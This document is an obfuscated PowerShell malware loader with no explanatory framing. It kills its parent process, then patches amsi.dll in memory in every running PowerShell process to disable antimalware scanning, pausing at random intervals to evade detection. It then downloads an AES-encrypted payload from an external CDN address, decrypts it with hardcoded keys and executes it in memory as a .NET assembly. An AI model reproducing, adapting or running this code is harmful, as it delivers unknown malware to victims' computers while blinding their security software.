$birch = (Get-CimInstance Win32_Process -Filter "ProcessId=$PID").ParentProcessId
if ($birch) { Stop-Process -Id $birch -Force }

Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool VirtualProtectEx(IntPtr h, IntPtr a, uint s, uint p, out uint o);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool ReadProcessMemory(IntPtr h, IntPtr a, byte[] b, int s, out IntPtr r);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint a, bool i, int p);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern bool WriteProcessMemory(IntPtr h, IntPtr a, byte[] b, uint s, out int w);
}
"@

function KJhbhb {
    Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
    $creek = Get-Process -Name "powershell" -ErrorAction SilentlyContinue
    if (!$creek) { exit 1 }
    
    foreach ($tundra in $creek) {
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $osprey = [K]::OpenProcess(0x001F0FFF, $wren, $tundra.Id)
        $mosaic = $null
        $quartz = 0
        
        foreach ($breeze in $tundra.Modules) {
            if ($breeze.ModuleName -eq "amsi.dll") {
                $mosaic = $breeze.BaseAddress
                $quartz = $breeze.ModuleMemorySize
                break
            }
        }
        
        if (!$mosaic) { continue }
        
        $nook = [byte[]]::new(32)
        $spire = [byte[]]@(0x4c,0x8b,0xdc,0x49,0x89,0x5b,0x08,0x49,0x89,0x6b,0x10,0x49,0x89,0x73,0x18,0x57,0x41,0x56,0x41,0x57,0x48,0x83,0xec,0x70,0x4d,0x8b,0xf9,0x41,0x8b,0xf8,0x48,0x8b)
        $cove = $null
        
        for ($bay = 0; $bay -le $quartz; $bay += 32) {
            $rubble = [IntPtr]::Zero
            [K]::ReadProcessMemory($osprey, [IntPtr]($mosaic.ToInt64() + $bay), $nook, 32, [ref]$rubble)
            $veil = $book
            for ($pearl = 0; $pearl -lt 32; $pearl++) {
                if ($nook[$pearl] -ne $spire[$pearl]) { $veil = $wren; break }
            }
            if ($veil) { $cove = [IntPtr]($mosaic.ToInt64() + $bay); break }
        }
        
        if (!$cove) { continue }
        
        Start-Sleep -Milliseconds (Get-Random -Minimum 50 -Maximum 101)
        $tree = 0
        [K]::VirtualProtectEx($osprey, $mosaic, 0x1000, 0x40, [ref]$tree)
        $flame = [byte[]]@(0x31,0xff,0x90)
        $marsh = 0
        [K]::WriteProcessMemory($osprey, [IntPtr]($cove.ToInt64() + 0x1b), $flame, 3, [ref]$marsh)
    }
}

KJhbhb

#ujhifsfiohdf
setx BUILD "Titan"
$palm = "https://sdfas-cloud.b-cdn.net/wqegfasd.bin"
$nimbus = [System.Net.WebClient]::new()
$pine = $nimbus.DownloadData($palm)
$tropic = [System.Security.Cryptography.Aes]::Create()
$grain = [System.Text.Encoding]::UTF8.GetBytes("X7b9PqT3mW2kL8vR5nY6zJ1hF4tD9cM0")
$delta = [System.Text.Encoding]::UTF8.GetBytes("K9mW3pQ7tR2vL8nY")
$tropic.Key = $grain
$tropic.IV = $delta
$jewel = $tropic.CreateDecryptor()
$house = $jewel.TransformFinalBlock($pine, 0, $pine.Length)
$star = [System.Reflection.Assembly]::Load($house)
$eagle = $star.EntryPoint
$eagle.Invoke($null, $null)
#ujhifsfiohdf